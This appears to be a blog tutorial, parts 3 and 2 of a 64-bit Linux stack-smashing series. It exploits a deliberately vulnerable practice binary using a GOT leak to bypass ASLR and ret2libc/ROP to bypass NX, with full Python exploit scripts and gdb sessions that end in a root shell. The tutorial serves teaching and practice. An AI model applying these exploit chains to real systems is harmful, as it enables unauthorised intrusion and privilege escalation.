64-bit Linux stack smashing tutorial: Part 3

It’s been almost a year since I posted part 2, and since then, I’ve received requests to write a follow-up on how to bypass ASLR. There are quite a few ways to do this, and rather than go over all of them, I’ve picked one interesting technique that I’ll describe here. It involves leaking a library function’s address from the GOT, and using it to determine the addresses of other functions in libc that we can return to.


The setup is identical to what I was using in part 1 and part 2. No new tools required.

Leaking a libc address

Here’s the source code for the binary we’ll be exploiting:

/* Compile: gcc -fno-stack-protector leak.c -o leak          */
/* Enable ASLR: echo 2 > /proc/sys/kernel/randomize_va_space */

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void helper() {
    asm("pop %rdi; pop %rsi; pop %rdx; ret");
}

int vuln() {
    char buf[150];
    ssize_t b;
    memset(buf, 0, 150);
    printf("Enter input: ");
    b = read(0, buf, 400);

    printf("Recv: ");
    write(1, buf, b);
    return 0;
}

int main(int argc, char *argv[]){
    setbuf(stdout, 0);
    vuln();
    return 0;
}

You can compile it yourself, or download the precompiled binary here.

The vulnerability is in the vuln() function, where read() is allowed to write 400 bytes into a 150 byte buffer. With ASLR on, we can’t just return to system() as its address will be different each time the program runs. The high level solution to exploiting this is as follows:

  1. Leak the address of a library function in the GOT. In this case, we’ll leak memset()’s GOT entry, which will give us memset()’s address.
  2. Get libc’s base address so we can calculate the address of other library functions. libc’s base address is memset()’s leaked address minus memset()’s offset within libc.so.6.
  3. A library function’s address can be obtained by adding its offset within libc.so.6 to libc’s base address. In this case, we’ll get system()’s address.
  4. Overwrite a GOT entry with system()’s address, so that when we call that function, it calls system() instead.

You should have a bit of an understanding on how shared libraries work in Linux. In a nutshell, the loader will initially point the GOT entry for a library function to some code that will do a slow lookup of the function address. Once it finds it, it overwrites its GOT entry with the address of the library function so it doesn’t need to do the lookup again. That means the second time a library function is called, the GOT entry will point to that function’s address. That’s what we want to leak. For a deeper understanding of how this all works, I refer you to PLT and GOT — the key to code sharing and dynamic libraries.
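To make the lazy-binding behaviour a bit more concrete, here is a toy Python 3 model of a single GOT slot. It is only a sketch: the class and method names are made up for illustration, and it is not how the real loader is implemented. The two addresses are the ones that show up in the gdb session in this post.

```python
# Toy model of lazy binding for one GOT slot. Illustrative only; not ld.so.
PLT_STUB = 0x400576            # memset@plt+6, the start of the slow lookup path
REAL_MEMSET = 0x7f86f37335c0   # where memset() was loaded in one particular run


class ToyGot:
    def __init__(self):
        # Before the first call, the GOT slot points back into the PLT.
        self.slot = PLT_STUB
        self.lookups = 0

    def call_memset(self):
        if self.slot == PLT_STUB:
            # First call: the resolver finds the symbol and patches the slot.
            self.lookups += 1
            self.slot = REAL_MEMSET
        # Every call ends up jumping to whatever the slot currently holds.
        return self.slot


got = ToyGot()
before = got.slot
got.call_memset()
got.call_memset()
after = got.slot
print(hex(before), hex(after), "lookups:", got.lookups)
```

The point to take away is that the slot only holds a libc address after the first call, which is why the leak has to happen after memset() has already run once.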

Let’s try to leak memset()’s address. We’ll run the binary under socat so we can communicate with it over port 2323:

# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./leak

Grab memset()’s entry in the GOT:

# objdump -R leak | grep memset
0000000000601030 R_X86_64_JUMP_SLOT  memset

Let’s set a breakpoint at the call to memset() in vuln(). If we disassemble vuln(), we see that the call happens at 0x4006c6. So add a breakpoint in ~/.gdbinit:

# echo "br *0x4006c6" >> ~/.gdbinit

Now let’s attach gdb to socat.

# gdb -q -p `pidof socat`
Breakpoint 1 at 0x4006c6
Attaching to process 10059
gdb-peda$ c

Hit “c” to continue execution. At this point, it’s waiting for us to connect, so we’ll fire up nc and connect to localhost on port 2323:

# nc localhost 2323

Now check gdb, and it will have hit the breakpoint, right before memset() is called.

   0x4006c3 <vuln+28>:  mov    rdi,rax
=> 0x4006c6 <vuln+31>:  call   0x400570 <memset@plt>
   0x4006cb <vuln+36>:  mov    edi,0x4007e4

Since this is the first time memset() is being called, we expect that its GOT entry points to the slow lookup function.

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x0000000000400576
gdb-peda$ x/5i 0x0000000000400576
   0x400576 <memset@plt+6>:     push   0x3
   0x40057b <memset@plt+11>:    jmp    0x400530
   0x400580 <read@plt>: jmp    QWORD PTR [rip+0x200ab2]        # 0x601038 <read@got.plt>
   0x400586 <read@plt+6>:       push   0x4
   0x40058b <read@plt+11>:      jmp    0x400530

Step over the call to memset() so that it executes, and examine its GOT entry again. This time it points to memset()’s address:

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x00007f86f37335c0
gdb-peda$ x/5i 0x00007f86f37335c0
   0x7f86f37335c0 <memset>:     movd   xmm8,esi
   0x7f86f37335c5 <memset+5>:   mov    rax,rdi
   0x7f86f37335c8 <memset+8>:   punpcklbw xmm8,xmm8
   0x7f86f37335cd <memset+13>:  punpcklwd xmm8,xmm8
   0x7f86f37335d2 <memset+18>:  pshufd xmm8,xmm8,0x0

If we can write memset()’s GOT entry back to us, we’ll receive its address of 0x00007f86f37335c0. We can do that by overwriting vuln()’s saved return pointer to set up a ret2plt; in this case, write@plt. Since we’re exploiting a 64-bit binary, we need to populate the RDI, RSI, and RDX registers with the arguments for write(). So we need to return to a ROP gadget that sets up these registers, and then we can return to write@plt.

I’ve created a helper function in the binary that contains a gadget that will pop three values off the stack into RDI, RSI, and RDX. If we disassemble helper(), we’ll see that the gadget starts at 0x4006a1. Here’s the start of our exploit:

#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

# keep socket open so gdb doesn't get a SIGTERM
while True:
    s.recv(1024)

Let’s see it in action:

# ./poc.py
Enter input:
memset() is at 0x7f679978e5c0

I recommend attaching gdb to socat as before and running poc.py. Step through the instructions so you can see what’s going on. After memset() is called, do a “p memset”, and compare that address with the leaked address you receive. If it’s identical, then you’ve successfully leaked memset()’s address.
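If you want to sanity check the decoding step on its own, the sketch below does it offline in Python 3 (the scripts in this post are Python 2, where socket data is a str rather than bytes). The parse_leak() helper and the simulated reply are my own illustration, not part of the exploit; the leaked value is the one from the run above.

```python
from struct import pack, unpack


def parse_leak(reply):
    """Return the little-endian 64-bit value held in the last 8 bytes."""
    if len(reply) < 8:
        raise ValueError("reply too short to contain a leaked pointer")
    return unpack("<Q", reply[-8:])[0]


# Simulated server reply: some echoed data followed by the 8 bytes that
# write@plt sent back from memset()'s GOT entry.
fake_reply = b"Recv: " + b"A" * 16 + pack("<Q", 0x7f679978e5c0)
leak = parse_leak(fake_reply)
print("memset() is at", hex(leak))
```

A quick check that usually catches a bad leak: the low 12 bits of the value should match the low 12 bits of memset()’s offset in your libc.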

Next we need to calculate libc’s base address in order to get the address of any library function, or even a gadget, in libc. First, we need to get memset()’s offset from libc.so.6. On my machine, libc.so.6 is at /lib/x86_64-linux-gnu/libc.so.6. You can find yours by using ldd:

# ldd leak
        linux-vdso.so.1 =>  (0x00007ffd5affe000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff25c07d000)
        /lib64/ld-linux-x86-64.so.2 (0x00005630d0961000)

libc.so.6 contains the offsets of all the functions available to us in libc. To get memset()’s offset, we can use readelf:

# readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep memset
    66: 00000000000a1de0   117 FUNC    GLOBAL DEFAULT   12 wmemset@@GLIBC_2.2.5
   771: 000000000010c150    16 FUNC    GLOBAL DEFAULT   12 __wmemset_chk@@GLIBC_2.4
   838: 000000000008c5c0   247 FUNC    GLOBAL DEFAULT   12 memset@@GLIBC_2.2.5
  1383: 000000000008c5b0     9 FUNC    GLOBAL DEFAULT   12 __memset_chk@@GLIBC_2.3.4

memset()’s offset is 0x8c5c0. Subtracting this from the leaked memset() address will give us libc’s base address.
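If you’d rather not pick the offset out by eye, a few lines of Python 3 can pull it from the readelf output. This is a minimal sketch that assumes the eight-column layout shown above; symbol_offset() is a name I made up, and the sample text is just the output pasted from my machine.

```python
READELF_SAMPLE = """\
    66: 00000000000a1de0   117 FUNC    GLOBAL DEFAULT   12 wmemset@@GLIBC_2.2.5
   771: 000000000010c150    16 FUNC    GLOBAL DEFAULT   12 __wmemset_chk@@GLIBC_2.4
   838: 000000000008c5c0   247 FUNC    GLOBAL DEFAULT   12 memset@@GLIBC_2.2.5
  1383: 000000000008c5b0     9 FUNC    GLOBAL DEFAULT   12 __memset_chk@@GLIBC_2.3.4
"""


def symbol_offset(readelf_output, name):
    """Find an exact FUNC symbol match and return its offset as an int."""
    for line in readelf_output.splitlines():
        fields = line.split()
        if len(fields) != 8:
            continue
        # Columns: Num, Value, Size, Type, Bind, Vis, Ndx, Name
        symbol = fields[7].split("@")[0]   # drop the @@GLIBC_x.y version suffix
        if symbol == name and fields[3] == "FUNC":
            return int(fields[1], 16)
    raise KeyError(name)


memset_off = symbol_offset(READELF_SAMPLE, "memset")
print(hex(memset_off))
```

Matching on the exact name matters here, since a plain grep also returns wmemset and the _chk variants.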

To find the address of any library function, we just do the reverse and add the function’s offset to libc’s base address. So to find system()’s address, we get its offset from libc.so.6, and add it to libc’s base address.
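Here is that arithmetic as a small Python 3 sketch, using the address leaked in the earlier run and the offsets from my copy of libc.so.6 (0x46640 is the system() offset the exploit in this post uses). The resolve() helper is only for illustration, and the offsets will differ on other libc versions.

```python
MEMSET_OFF = 0x08c5c0   # memset()'s offset in my libc.so.6
SYSTEM_OFF = 0x046640   # system()'s offset in my libc.so.6


def resolve(leaked_memset, target_off):
    """Turn one leaked address into libc's base and a target address."""
    libc_base = leaked_memset - MEMSET_OFF
    # Shared libraries are mapped on page boundaries, so a base address
    # that is not 4 KiB aligned means the offset or the leak is wrong.
    if libc_base & 0xfff:
        raise ValueError("libc base is not page aligned")
    return libc_base, libc_base + target_off


libc_base, system_addr = resolve(0x7f679978e5c0, SYSTEM_OFF)
print("libc base is", hex(libc_base))
print("system() is at", hex(system_addr))
```

The page-alignment check is cheap and tends to catch the common mistake of using offsets from the wrong libc.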

Here’s our modified exploit that leaks memset()’s address, calculates libc’s base address, and finds the address of system():

# ./poc.py
#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# keep socket open so gdb doesn't get a SIGTERM
while True:
    s.recv(1024)

And here it is in action:

# ./poc.py
Enter input:
memset() is at 0x7f9d206e45c0
libc base is 0x7f9d20658000
system() is at 0x7f9d2069e640

Now that we can get any library function address, we can do a ret2libc to complete the exploit. We’ll overwrite memset()’s GOT entry with the address of system(), so that when we trigger a call to memset(), it will call system(“/bin/sh”) instead. Here’s what we need to do:

  1. Overwrite memset()’s GOT entry with the address of system() using read@plt.
  2. Write “/bin/sh” somewhere in memory using read@plt. We’ll use 0x601000 since it’s a writable location with a static address.
  3. Set RDI to the location of “/bin/sh” and return to system().
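Each of these steps, along with the initial leak, has the same shape on the stack: the pop3ret gadget, three argument values, then the PLT entry to return to. The Python 3 sketch below builds the chain with a small helper to make that pattern obvious. call3() is a name I made up for this illustration, and the addresses are the ones from this binary.

```python
from struct import pack

POP3RET = 0x4006a1      # pop rdi; pop rsi; pop rdx; ret
WRITE_PLT = 0x400540
READ_PLT = 0x400580
MEMSET_PLT = 0x400570
MEMSET_GOT = 0x601030
WRITEABLE = 0x601000


def call3(func, rdi, rsi, rdx):
    """One ROP 'call': load three arguments, then return into func."""
    return b"".join(pack("<Q", v) for v in (POP3RET, rdi, rsi, rdx, func))


chain = b"A" * 168                              # padding up to the saved RIP
chain += call3(WRITE_PLT, 1, MEMSET_GOT, 8)     # leak memset()'s address
chain += call3(READ_PLT, 0, MEMSET_GOT, 8)      # overwrite memset()'s GOT entry
chain += call3(READ_PLT, 0, WRITEABLE, 8)       # read "/bin/sh" into memory
chain += call3(MEMSET_PLT, WRITEABLE, 1, 1)     # memset@plt is now system()
print(len(chain))
```

It’s worth checking the length: the chain has to fit within the 400 bytes that read() accepts in vuln(), and at 328 bytes it does with room to spare.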

Here’s the final exploit:

#!/usr/bin/env python

import telnetlib
from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
read_plt   = 0x400580            # address of read@plt
memset_plt = 0x400570            # address of memset@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret
writeable  = 0x601000            # location to write "/bin/sh" to

# leak memset()'s libc address using write@plt
buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

# payload for stage 1: overwrite memset()'s GOT entry using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # stdin
buf += pack("<Q", memset_got)   # address to write to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 2: read "/bin/sh" into 0x601000 using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # stdin
buf += pack("<Q", writeable)    # location to write "/bin/sh" to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 3: set RDI to location of "/bin/sh", and call system()
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", writeable)    # address of "/bin/sh"
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", memset_plt)   # return to memset@plt which is actually system() now

s = socket(AF_INET, SOCK_STREAM)
s.connect(("", 2323))

# stage 1: overwrite RIP so we return to write@plt to leak memset()'s libc address
print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# stage 2: send address of system() to overwrite memset()'s GOT entry
print "sending system()'s address", hex(system_addr)
s.send(pack("<Q", system_addr))

# stage 3: send "/bin/sh" to writable location
print "sending '/bin/sh'"
s.send("/bin/sh\x00")           # NUL-terminated; exactly the 8 bytes read() asks for

# get a shell
t = telnetlib.Telnet()
t.sock = s
t.interact()

I’ve commented the code heavily, so hopefully that will explain what’s going on. If you’re still a bit confused, attach gdb to socat and step through the process. For good measure, let’s run the binary as the root user, and run the exploit as a non-privileged user:

koji@pwnbox:/root/work$ whoami
koji@pwnbox:/root/work$ ./poc.py
Enter input:
memset() is at 0x7f57f50015c0
libc base is 0x7f57f4f75000
system() is at 0x7f57f4fbb640
+ sending system()'s address 0x7f57f4fbb640
+ sending '/bin/sh'

We got a root shell, and we bypassed both ASLR and NX!

We’ve looked at one way to bypass ASLR by leaking an address in the GOT. There are other ways to do it, and I refer you to the ASLR Smack & Laugh Reference for some interesting reading. Before I end off, you may have noticed that you need to have the correct version of libc to subtract an offset from the leaked address in order to get libc’s base address. If you don’t have access to the target’s version of libc, you can attempt to identify it using libc-database. Just pass it the leaked address and hopefully, it will identify the libc version on the target, which will allow you to get the correct offset of a function.
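The reason a leaked address can identify a libc at all is that libc is mapped on a page boundary, so the low 12 bits of a function’s runtime address are the same as the low 12 bits of its offset in the file. The Python 3 sketch below shows the idea only; it is not libc-database’s implementation, and the candidate table is hypothetical apart from the first entry, which is the memset() offset from my libc.

```python
PAGE_MASK = 0xfff

# Hypothetical lookup table of memset() offsets. Only the first value is
# real (it is the one used in this post); the other two are made up.
CANDIDATES = {
    "libc-build-A (hypothetical)": 0x08c5c0,
    "libc-build-B (hypothetical)": 0x091a30,
    "libc-build-C (hypothetical)": 0x0885c0,
}


def matching_builds(leaked_addr, candidates):
    """Return the builds whose offset agrees with the leak's low 12 bits."""
    low = leaked_addr & PAGE_MASK
    return sorted(name for name, off in candidates.items()
                  if off & PAGE_MASK == low)


matches = matching_builds(0x7f57f50015c0, CANDIDATES)
print(matches)
```

Two of the three made-up builds match here, which is the practical lesson: a single leak may not be enough, and leaking a second function’s address usually narrows things down.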


64-bit Linux stack smashing tutorial: Part 2

This is part 2 of my 64-bit Linux Stack Smashing tutorial. In part 1 we exploited a 64-bit binary using a classic stack overflow and learned that we can’t just blindly expect to overwrite RIP by spamming the buffer with bytes. We turned off ASLR, NX, and stack canaries in part 1 so we could focus on the exploitation rather than bypassing these security features. This time we’ll enable NX and look at how we can exploit the same binary using ret2libc.


The setup is identical to what I was using in part 1. We’ll also be making use of the following:


Here’s the same binary we exploited in part 1. The only difference is we’ll keep NX enabled which will prevent our previous exploit from working since the stack is now non-executable:

/* Compile: gcc -fno-stack-protector ret2libc.c -o ret2libc      */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space     */

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

You can also grab the precompiled binary here.

In 32-bit binaries, a ret2libc attack involves setting up a fake stack frame so that the vulnerable function returns into a function in libc and passes it any parameters it needs. Typically this would be returning to system() and having it execute “/bin/sh”.

In 64-bit binaries, function parameters are passed in registers, therefore there’s no need to fake a stack frame. The first six parameters are passed in registers RDI, RSI, RDX, RCX, R8, and R9. Anything beyond that is passed on the stack. This means that before returning to our function of choice in libc, we need to make sure the registers are set up correctly with the parameters the function is expecting. This in turn leads us to having to use a bit of Return Oriented Programming (ROP). If you’re not familiar with ROP, don’t worry, we won’t be going into the crazy stuff.
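As a quick illustration of that register order, here is a Python 3 sketch that maps a call’s arguments onto registers and the stack. It only models integer and pointer arguments, and place_args() is a name I made up for the example.

```python
# Register order for the first six integer/pointer arguments on 64-bit Linux.
ARG_REGISTERS = ("rdi", "rsi", "rdx", "rcx", "r8", "r9")


def place_args(*args):
    """Return (registers, stack) showing where each argument ends up."""
    regs = dict(zip(ARG_REGISTERS, args))
    stack = list(args[len(ARG_REGISTERS):])   # seventh argument onwards
    return regs, stack


# system("/bin/sh") needs a single pointer, which goes in RDI.
regs1, stack1 = place_args(0x4006ff)

# A call with eight arguments spills the last two onto the stack.
regs8, stack8 = place_args(1, 2, 3, 4, 5, 6, 7, 8)

print(regs1, stack1)
print(regs8, stack8)
```

For system() that means a single gadget that loads RDI is enough; a three-argument function needs RDI, RSI, and RDX loaded before we return to it.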

We’ll start with a simple exploit that returns to system() and executes “/bin/sh”. We need a few things:

  • The address of system(). ASLR is disabled so we don’t have to worry about this address changing.
  • A pointer to “/bin/sh”.
  • Since the first function parameter needs to be in RDI, we need a ROP gadget that will copy the pointer to “/bin/sh” into RDI.

Let’s start with finding the address of system(). This is easily done within gdb:

gdb-peda$ start
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0x7ffff7a5ac40 <system>

We can just as easily search for a pointer to “/bin/sh”:

gdb-peda$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 3 results, display max 3 items:
ret2libc : 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
ret2libc : 0x6006ff --> 0x68732f6e69622f ('/bin/sh')
    libc : 0x7ffff7b9209b --> 0x68732f6e69622f ('/bin/sh')

The first two pointers are from the string in the binary that prints out “Try to exec /bin/sh”. The third is from libc itself, and in fact if you do have access to libc, then feel free to use it. In this case, we’ll go with the first one at 0x4006ff.

Now we need a gadget that copies 0x4006ff to RDI. We can search for one using ropper. Let’s see if we can find any instructions that use EDI or RDI:

koji@pwnbox:~/ret2libc$ ropper --file ret2libc --search "% ?di"

0x0000000000400520: mov edi, 0x601050; jmp rax;
0x000000000040051f: pop rbp; mov edi, 0x601050; jmp rax;
0x00000000004006a3: pop rdi; ret ;

3 gadgets found

The third gadget that pops a value off the stack into RDI is perfect. We now have everything we need to construct our exploit:

#!/usr/bin/env python

from struct import *

buf = ""
buf += "A"*104                              # junk
buf += pack("<Q", 0x00000000004006a3)       # pop rdi; ret;
buf += pack("<Q", 0x4006ff)                 # pointer to "/bin/sh" gets popped into rdi
buf += pack("<Q", 0x7ffff7a5ac40)           # address of system()

f = open("in.txt", "w")
f.write(buf)
f.close()

This exploit will write our payload into in.txt which we can redirect into the binary within gdb. Let’s go over it quickly:

  • Line 7: We overwrite RIP with the address of our ROP gadget so when vuln() returns, it executes pop rdi; ret.
  • Line 8: This value is popped into RDI when pop rdi is executed. Once that’s done, RSP will be pointing to 0x7ffff7a5ac40; the address of system().
  • Line 9: When ret executes after pop rdi, execution returns to system(). system() will look at RDI for the parameter it expects and execute it. In this case, it executes “/bin/sh”.
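If it helps to see those three steps without a debugger, the Python 3 sketch below plays them out on a list standing in for the stack. It’s a toy model rather than an emulator: pop() and the register dictionary are just for illustration.

```python
POP_RDI_RET = 0x4006a3      # gadget: pop rdi; ret
BIN_SH = 0x4006ff           # pointer to "/bin/sh"
SYSTEM = 0x7ffff7a5ac40     # address of system() with ASLR disabled

# Stack contents starting at the saved return address (lowest address first).
stack = [POP_RDI_RET, BIN_SH, SYSTEM]
regs = {"rip": None, "rdi": None}
trace = []


def pop():
    """Model an 8-byte pop: take the value RSP points at and advance RSP."""
    return stack.pop(0)


regs["rip"] = pop()          # vuln()'s ret jumps to the gadget
trace.append(("ret", dict(regs)))
regs["rdi"] = pop()          # the gadget's pop rdi loads the "/bin/sh" pointer
trace.append(("pop rdi", dict(regs)))
regs["rip"] = pop()          # the gadget's ret jumps to system()
trace.append(("ret", dict(regs)))

for insn, state in trace:
    print(insn, {k: hex(v) if v is not None else None for k, v in state.items()})
```

By the time execution reaches system(), RDI holds the pointer and all three values have been consumed from the stack.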

Let’s see it in action in gdb. We’ll set a breakpoint at vuln()’s return instruction:

gdb-peda$ br *vuln+73
Breakpoint 1 at 0x40060f

Now we’ll redirect the payload into the binary and it should hit our first breakpoint:

gdb-peda$ r < in.txt
Try to exec /bin/sh
No shell for you :(
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
0000| 0x7fffffffe508 --> 0x4006a3 (<__libc_csu_init+99>:    pop    rdi)
0008| 0x7fffffffe510 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
0016| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0024| 0x7fffffffe520 --> 0x0
0032| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0040| 0x7fffffffe530 --> 0x0
0048| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0056| 0x7fffffffe540 --> 0x100000000
Legend: code, data, rodata, value

Breakpoint 1, 0x000000000040060f in vuln ()

Notice that RSP points to 0x4006a3 which is our ROP gadget. Step in and we’ll return to our gadget where we can now execute pop rdi.

gdb-peda$ si
=> 0x4006a3 <__libc_csu_init+99>:   pop    rdi
   0x4006a4 <__libc_csu_init+100>:  ret
   0x4006a5:    data32 nop WORD PTR cs:[rax+rax*1+0x0]
   0x4006b0 <__libc_csu_fini>:  repz ret
0000| 0x7fffffffe510 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
0008| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0016| 0x7fffffffe520 --> 0x0
0024| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0032| 0x7fffffffe530 --> 0x0
0040| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0048| 0x7fffffffe540 --> 0x100000000
0056| 0x7fffffffe548 --> 0x400610 (<main>:  push   rbp)
Legend: code, data, rodata, value
0x00000000004006a3 in __libc_csu_init ()

Step in and RDI should now contain a pointer to “/bin/sh”:

gdb-peda$ si
RDI: 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
   0x40069e <__libc_csu_init+94>:   pop    r13
   0x4006a0 <__libc_csu_init+96>:   pop    r14
   0x4006a2 <__libc_csu_init+98>:   pop    r15
=> 0x4006a4 <__libc_csu_init+100>:  ret
   0x4006a5:    data32 nop WORD PTR cs:[rax+rax*1+0x0]
   0x4006b0 <__libc_csu_fini>:  repz ret
   0x4006b2:    add    BYTE PTR [rax],al
   0x4006b4 <_fini>:    sub    rsp,0x8
0000| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0008| 0x7fffffffe520 --> 0x0
0016| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0024| 0x7fffffffe530 --> 0x0
0032| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0040| 0x7fffffffe540 --> 0x100000000
0048| 0x7fffffffe548 --> 0x400610 (<main>:  push   rbp)
0056| 0x7fffffffe550 --> 0x0
Legend: code, data, rodata, value
0x00000000004006a4 in __libc_csu_init ()

Now RIP points to ret and RSP points to the address of system(). Step in again and we should now be in system().

gdb-peda$ si
   0x7ffff7a5ac35 <cancel_handler+181>: pop    rbx
   0x7ffff7a5ac36 <cancel_handler+182>: ret
   0x7ffff7a5ac37:  nop    WORD PTR [rax+rax*1+0x0]
=> 0x7ffff7a5ac40 <system>: test   rdi,rdi
   0x7ffff7a5ac43 <system+3>:   je     0x7ffff7a5ac50 <system+16>
   0x7ffff7a5ac45 <system+5>:   jmp    0x7ffff7a5a770 <do_system>
   0x7ffff7a5ac4a <system+10>:  nop    WORD PTR [rax+rax*1+0x0]
   0x7ffff7a5ac50 <system+16>:  lea    rdi,[rip+0x13744c]        # 0x7ffff7b920a3

At this point if we just continue execution we should see that “/bin/sh” is executed:

gdb-peda$ c
[New process 11114]
process 11114 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
[New process 11115]
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
process 11115 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
[Inferior 3 (process 11115) exited normally]
Warning: not running or target is remote

Perfect, it looks like our exploit works. Let’s try it and see if we can get a root shell. We’ll change ret2libc’s owner and permissions so that it’s SUID root:

koji@pwnbox:~/ret2libc$ sudo chown root ret2libc
koji@pwnbox:~/ret2libc$ sudo chmod 4755 ret2libc

Now let’s execute our exploit much like we did in part 1:

koji@pwnbox:~/ret2libc$ (cat in.txt ; cat) | ./ret2libc
Try to exec /bin/sh
No shell for you :(

Got our root shell again, and we bypassed NX. Now this was a relatively simple exploit that only required one parameter. What if we need more? Then we need to find more gadgets that set up the registers accordingly before returning to a function in libc. If you’re up for a challenge, rewrite the exploit so that it calls execve() instead of system(). execve() requires three parameters:

int execve(const char *filename, char *const argv[], char *const envp[]);

This means you’ll need to have RDI, RSI, and RDX populated with proper values before calling execve(). Try to use gadgets only within the binary itself, that is, don’t look for gadgets in libc.

64-bit Linux stack smashing tutorial: Part 1

